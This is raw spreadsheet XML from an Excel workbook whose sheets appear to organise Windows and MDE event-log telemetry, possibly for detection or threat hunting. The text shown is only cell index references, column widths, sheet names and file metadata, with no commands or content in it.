    <row r="10" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C10" t="s">
        <v>57</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E10" s="1"/>
      <c r="L10" t="s">
        <v>110</v>
      </c>
      <c r="M10" s="1" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="11" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C11" t="s">
        <v>63</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>62</v>
      </c>
      <c r="E11" s="1"/>
      <c r="L11" t="s">
        <v>111</v>
      </c>
      <c r="M11" s="1" t="s">
        <v>97</v>
      </c>
    </row>
    <row r="12" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C12" t="s">
        <v>65</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>64</v>
      </c>
      <c r="E12" s="1"/>
      <c r="L12" t="s">
        <v>112</v>
      </c>
      <c r="M12" s="1" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="13" spans="1:13" ht="85" x14ac:dyDescent="0.2">
      <c r="C13" t="s">
        <v>67</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>66</v>
      </c>
      <c r="E13" s="1"/>
      <c r="L13" t="s">
        <v>113</v>
      </c>
      <c r="M13" s="1" t="s">
        <v>99</v>
      </c>
    </row>
    <row r="14" spans="1:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C14" t="s">
        <v>70</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>71</v>
      </c>
      <c r="E14" s="1"/>
      <c r="L14" t="s">
        <v>104</v>
      </c>
      <c r="M14" s="1" t="s">
        <v>105</v>
      </c>
    </row>
    <row r="15" spans="1:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C15" t="s">
        <v>73</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E15" s="1"/>
      <c r="L15" t="s">
        <v>102</v>
      </c>
      <c r="M15" s="1" t="s">
        <v>103</v>
      </c>
    </row>
    <row r="16" spans="1:13" ht="221" x14ac:dyDescent="0.2">
      <c r="C16" t="s">
        <v>75</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>74</v>
      </c>
      <c r="E16" s="1"/>
      <c r="L16" t="s">
        <v>100</v>
      </c>
      <c r="M16" s="1" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="17" spans="3:13" ht="51" x14ac:dyDescent="0.2">
      <c r="C17" t="s">
        <v>76</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>171</v>
      </c>
      <c r="E17" s="1"/>
      <c r="L17" t="s">
        <v>129</v>
      </c>
      <c r="M17" s="1" t="s">
        <v>134</v>
      </c>
    </row>
    <row r="18" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C18" t="s">
        <v>77</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>64</v>
      </c>
      <c r="E18" s="1"/>
      <c r="L18" t="s">
        <v>128</v>
      </c>
      <c r="M18" s="1" t="s">
        <v>132</v>
      </c>
    </row>
    <row r="19" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C19" t="s">
        <v>79</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>78</v>
      </c>
      <c r="E19" s="1"/>
      <c r="L19" t="s">
        <v>127</v>
      </c>
      <c r="M19" s="1" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="20" spans="3:13" ht="51" x14ac:dyDescent="0.2">
      <c r="C20" t="s">
        <v>80</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>81</v>
      </c>
      <c r="E20" s="1"/>
      <c r="L20" t="s">
        <v>126</v>
      </c>
      <c r="M20" s="1" t="s">
        <v>130</v>
      </c>
    </row>
    <row r="21" spans="3:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C21" t="s">
        <v>83</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>82</v>
      </c>
      <c r="E21" s="1"/>
      <c r="L21" t="s">
        <v>124</v>
      </c>
      <c r="M21" s="1" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="22" spans="3:13" ht="68" x14ac:dyDescent="0.2">
      <c r="C22" t="s">
        <v>84</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>85</v>
      </c>
      <c r="E22" s="1"/>
      <c r="L22" t="s">
        <v>122</v>
      </c>
      <c r="M22" s="1" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="23" spans="3:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C23" t="s">
        <v>87</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>86</v>
      </c>
      <c r="E23" s="1"/>
      <c r="L23" t="s">
        <v>114</v>
      </c>
      <c r="M23" s="1" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="24" spans="3:13" ht="51" x14ac:dyDescent="0.2">
      <c r="C24" t="s">
        <v>88</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>172</v>
      </c>
      <c r="E24" s="1"/>
      <c r="L24" t="s">
        <v>115</v>
      </c>
      <c r="M24" s="1" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="25" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C25" t="s">
        <v>68</v>
      </c>
      <c r="D25" s="1" t="s">
        <v>69</v>
      </c>
      <c r="E25" s="1"/>
      <c r="L25" t="s">
        <v>125</v>
      </c>
      <c r="M25" s="1" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="26" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C26" t="s">
        <v>138</v>
      </c>
      <c r="D26" s="1" t="s">
        <v>150</v>
      </c>
      <c r="E26" s="1"/>
      <c r="L26" t="s">
        <v>139</v>
      </c>
      <c r="M26" s="1" t="s">
        <v>140</v>
      </c>
    </row>
    <row r="27" spans="3:13" ht="51" x14ac:dyDescent="0.2">
      <c r="C27" t="s">
        <v>143</v>
      </c>
      <c r="D27" s="1" t="s">
        <v>173</v>
      </c>
      <c r="E27" s="1"/>
      <c r="L27" t="s">
        <v>142</v>
      </c>
      <c r="M27" s="1" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="28" spans="3:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C28" t="s">
        <v>144</v>
      </c>
      <c r="D28" s="1" t="s">
        <v>145</v>
      </c>
      <c r="E28" s="1"/>
      <c r="L28" t="s">
        <v>146</v>
      </c>
      <c r="M28" s="1" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="29" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C29" t="s">
        <v>148</v>
      </c>
      <c r="D29" s="1" t="s">
        <v>149</v>
      </c>
      <c r="E29" s="1"/>
      <c r="L29" t="s">
        <v>152</v>
      </c>
      <c r="M29" s="1" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="30" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C30" t="s">
        <v>153</v>
      </c>
      <c r="D30" s="1" t="s">
        <v>154</v>
      </c>
      <c r="E30" s="1"/>
      <c r="L30" t="s">
        <v>155</v>
      </c>
      <c r="M30" s="1" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="31" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C31" t="s">
        <v>157</v>
      </c>
      <c r="D31" s="1" t="s">
        <v>159</v>
      </c>
      <c r="E31" s="1"/>
      <c r="L31" t="s">
        <v>160</v>
      </c>
      <c r="M31" s="1" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="32" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C32" t="s">
        <v>162</v>
      </c>
      <c r="D32" s="1" t="s">
        <v>163</v>
      </c>
      <c r="E32" s="1"/>
      <c r="L32" t="s">
        <v>164</v>
      </c>
      <c r="M32" s="1" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="33" spans="3:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C33" t="s">
        <v>167</v>
      </c>
      <c r="D33" s="1" t="s">
        <v>166</v>
      </c>
      <c r="E33" s="1"/>
      <c r="L33" t="s">
        <v>168</v>
      </c>
      <c r="M33" s="1" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="34" spans="3:13" ht="34" x14ac:dyDescent="0.2">
      <c r="C34" t="s">
        <v>175</v>
      </c>
      <c r="D34" s="1" t="s">
        <v>174</v>
      </c>
      <c r="E34" s="1"/>
      <c r="L34" t="s">
        <v>176</v>
      </c>
      <c r="M34" s="1" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="35" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C35" t="s">
        <v>178</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>179</v>
      </c>
      <c r="E35" s="1"/>
      <c r="L35" t="s">
        <v>180</v>
      </c>
      <c r="M35" s="1" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="36" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C36" t="s">
        <v>182</v>
      </c>
      <c r="D36" s="1" t="s">
        <v>183</v>
      </c>
      <c r="E36" s="1"/>
      <c r="L36" t="s">
        <v>184</v>
      </c>
      <c r="M36" s="1" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="37" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C37" t="s">
        <v>186</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>187</v>
      </c>
      <c r="E37" s="1"/>
      <c r="L37" t="s">
        <v>188</v>
      </c>
      <c r="M37" s="1" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="38" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C38" t="s">
        <v>191</v>
      </c>
      <c r="D38" s="1" t="s">
        <v>190</v>
      </c>
      <c r="E38" s="1"/>
      <c r="L38" t="s">
        <v>192</v>
      </c>
      <c r="M38" s="1" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="39" spans="3:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C39" t="s">
        <v>194</v>
      </c>
      <c r="D39" s="1" t="s">
        <v>195</v>
      </c>
      <c r="E39" s="1"/>
      <c r="L39" t="s">
        <v>196</v>
      </c>
      <c r="M39" s="1" t="s">
        <v>197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D4B96-2A70-8F41-82BB-D13A0D8F922A}">
  <dimension ref="A3:C5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F11" sqref="F11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="3" width="16" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="B3" t="s">
        <v>12</v>
      </c>
      <c r="C3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s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F124B-0D0F-4944-9A22-4A3E89799EA8}">
  <dimension ref="A3:C5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A14" sqref="A14:A15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="3" width="16" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="B3" t="s">
        <v>12</v>
      </c>
      <c r="C3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3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8701A-34C1-694C-BD7B-B9EA00ECE591}">
  <dimension ref="A1:K2"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="H20" sqref="H20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.1640625" customWidth="1"/>
    <col min="2" max="2" width="11" customWidth="1"/>
    <col min="3" max="3" width="12.83203125" customWidth="1"/>
    <col min="4" max="4" width="13.6640625" customWidth="1"/>
    <col min="5" max="5" width="34.83203125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="13.33203125" customWidth="1"/>
    <col min="7" max="7" width="27.5" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="74.1640625" customWidth="1"/>
    <col min="11" max="11" width="150.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A1" s="6" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="6" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="6" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="6" t="s">
        <v>25</v>
      </c>
      <c r="E1" s="6" t="s">
        <v>26</v>
      </c>
      <c r="F1" s="6" t="s">
        <v>27</v>
      </c>
      <c r="G1" s="6" t="s">
        <v>28</v>
      </c>
      <c r="H1" s="6" t="s">
        <v>29</v>
      </c>
      <c r="I1" s="6" t="s">
        <v>30</v>
      </c>
      <c r="J1" s="6" t="s">
        <v>31</v>
      </c>
      <c r="K1" s="6" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:11" x14ac:dyDescent="0.2">
      <c r="I2" s="1"/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F2AE5-5FB3-2247-8F3F-BB9788663E70}">
  <dimension ref="A1:J2"/>
  <sheetViews>
    <sheetView topLeftCell="E1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2:J2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13.83203125" customWidth="1"/>
    <col min="2" max="2" width="21" customWidth="1"/>
    <col min="3" max="3" width="33.1640625" style="1" customWidth="1"/>
    <col min="4" max="4" width="14.5" customWidth="1"/>
    <col min="5" max="5" width="53.83203125" customWidth="1"/>
    <col min="6" max="7" width="25.1640625" customWidth="1"/>
    <col min="8" max="8" width="33.6640625" style="1" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="25.1640625" customWidth="1"/>
    <col min="10" max="10" width="147.83203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="8" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="13" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="8" t="s">
        <v>15</v>
      </c>
      <c r="E1" s="8" t="s">
        <v>18</v>
      </c>
      <c r="F1" s="8" t="s">
        <v>19</v>
      </c>
      <c r="G1" s="8" t="s">
        <v>34</v>
      </c>
      <c r="H1" s="13" t="s">
        <v>40</v>
      </c>
      <c r="I1" s="8" t="s">
        <v>2</v>
      </c>
      <c r="J1" s="8" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:10" x14ac:dyDescent="0.2">
      <c r="E2" s="1"/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08094-03D3-F242-BFAD-3D6BF09CACB6}">
  <dimension ref="A1:I2"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2:I2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="18.6640625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="19.6640625" customWidth="1"/>
    <col min="3" max="3" width="29" customWidth="1"/>
    <col min="4" max="4" width="12.33203125" customWidth="1"/>
    <col min="5" max="7" width="21" customWidth="1"/>
    <col min="8" max="8" width="35.1640625" customWidth="1"/>
    <col min="9" max="9" width="136.6640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A1" s="7" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="7" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="7" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="7" t="s">
        <v>23</v>
      </c>
      <c r="E1" s="7" t="s">
        <v>24</v>
      </c>
      <c r="F1" s="7" t="s">
        <v>32</v>
      </c>
      <c r="G1" s="7" t="s">
        <v>22</v>
      </c>
      <c r="H1" s="7" t="s">
        <v>5</v>
      </c>
      <c r="I1" s="7" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:9" ht="17" customHeight="1" x14ac:dyDescent="0.2"/>
  </sheetData>
  <phoneticPr fontId="1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33C91-8A3B-444D-AD5E-9DDFC484FADA}">
  <dimension ref="A1:I1"/>
  <sheetViews>
    <sheetView topLeftCell="B1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2:I2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="2" width="15.33203125" customWidth="1"/>
    <col min="3" max="3" width="36.1640625" customWidth="1"/>
    <col min="4" max="4" width="69" style="1" customWidth="1"/>
    <col min="5" max="5" width="17.1640625" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="15.1640625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="12" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="20.5" customWidth="1"/>
    <col min="9" max="9" width="116" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="11" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="11" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="11" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="12" t="s">
        <v>37</v>
      </c>
      <c r="E1" s="11" t="s">
        <v>39</v>
      </c>
      <c r="F1" s="11" t="s">
        <v>35</v>
      </c>
      <c r="G1" s="11" t="s">
        <v>36</v>
      </c>
      <c r="H1" s="11" t="s">
        <v>5</v>
      </c>
      <c r="I1" s="11" t="s">
        <v>7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FC8D0-37F4-D143-BA93-59E1CCDB5F2E}">
  <dimension ref="A1:J2"/>
  <sheetViews>
    <sheetView topLeftCell="G1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2:J2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.33203125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="11" customWidth="1"/>
    <col min="3" max="4" width="34.1640625" customWidth="1"/>
    <col min="5" max="5" width="17.83203125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="90" customWidth="1"/>
    <col min="7" max="7" width="24.33203125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="30.6640625" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="42.33203125" style="1" customWidth="1"/>
    <col min="10" max="10" width="150.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="4" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="4" t="s">
        <v>33</v>
      </c>
      <c r="E1" s="4" t="s">
        <v>1</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="G1" s="4" t="s">
        <v>4</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>38</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>31</v>
      </c>
      <c r="J1" s="4" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2" s="1"/>
      <c r="F2" s="1"/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9C52C-640B-CF44-8F28-42BC59DA89EE}">
  <dimension ref="A1:H2"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="C1" sqref="C1"/>
      <selection pane="bottomLeft" activeCell="H12" sqref="H12:H13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.83203125" customWidth="1"/>
    <col min="2" max="2" width="19.5" customWidth="1"/>
    <col min="3" max="3" width="55.83203125" style="1" customWidth="1"/>
    <col min="4" max="4" width="25.83203125" customWidth="1"/>
    <col min="5" max="5" width="20" customWidth="1"/>
    <col min="6" max="6" width="17.33203125" customWidth="1"/>
    <col min="7" max="7" width="74" style="1" customWidth="1"/>
    <col min="8" max="8" width="210.33203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="9" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="9" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="10" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="9" t="s">
        <v>13</v>
      </c>
      <c r="E1" s="9" t="s">
        <v>14</v>
      </c>
      <c r="F1" s="9" t="s">
        <v>20</v>
      </c>
      <c r="G1" s="10" t="s">
        <v>21</v>
      </c>
      <c r="H1" s="9" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:8" ht="17" x14ac:dyDescent="0.2">
      <c r="C2" s="1" t="s">
        <v>60</v>
      </c>
      <c r="H2" s="1" t="s">
        <v>61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87956-36B5-3A4B-81A2-CA08B1F3354E}">
  <dimension ref="A3:C5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A4" sqref="A4:A20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="3" width="16" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="B3" t="s">
        <v>12</v>
      </c>
      <c r="C3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s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7698E-4B75-3942-98B8-C825FE8EE637}">
  <dimension ref="A3:C5"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A20" sqref="A20"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="3" width="16" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="B3" t="s">
        <v>12</v>
      </c>
      <c r="C3" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3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process_create</vt:lpstr>
      <vt:lpstr>process_access</vt:lpstr>
      <vt:lpstr>file_event</vt:lpstr>
      <vt:lpstr>winevt_4624</vt:lpstr>
      <vt:lpstr>winevt_7045</vt:lpstr>
      <vt:lpstr>mde</vt:lpstr>
      <vt:lpstr>generic</vt:lpstr>
      <vt:lpstr>pc_pivot</vt:lpstr>
      <vt:lpstr>pa_pivot</vt:lpstr>
      <vt:lpstr>file_pivot</vt:lpstr>
      <vt:lpstr>gen_pivot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Harvey Wargo</dc:creator>
  <cp:lastModifiedBy>Harvey Wargo</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-26T10:20:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-07T16:00:15Z</dcterms:modified>
</cp:coreProperties>
</file>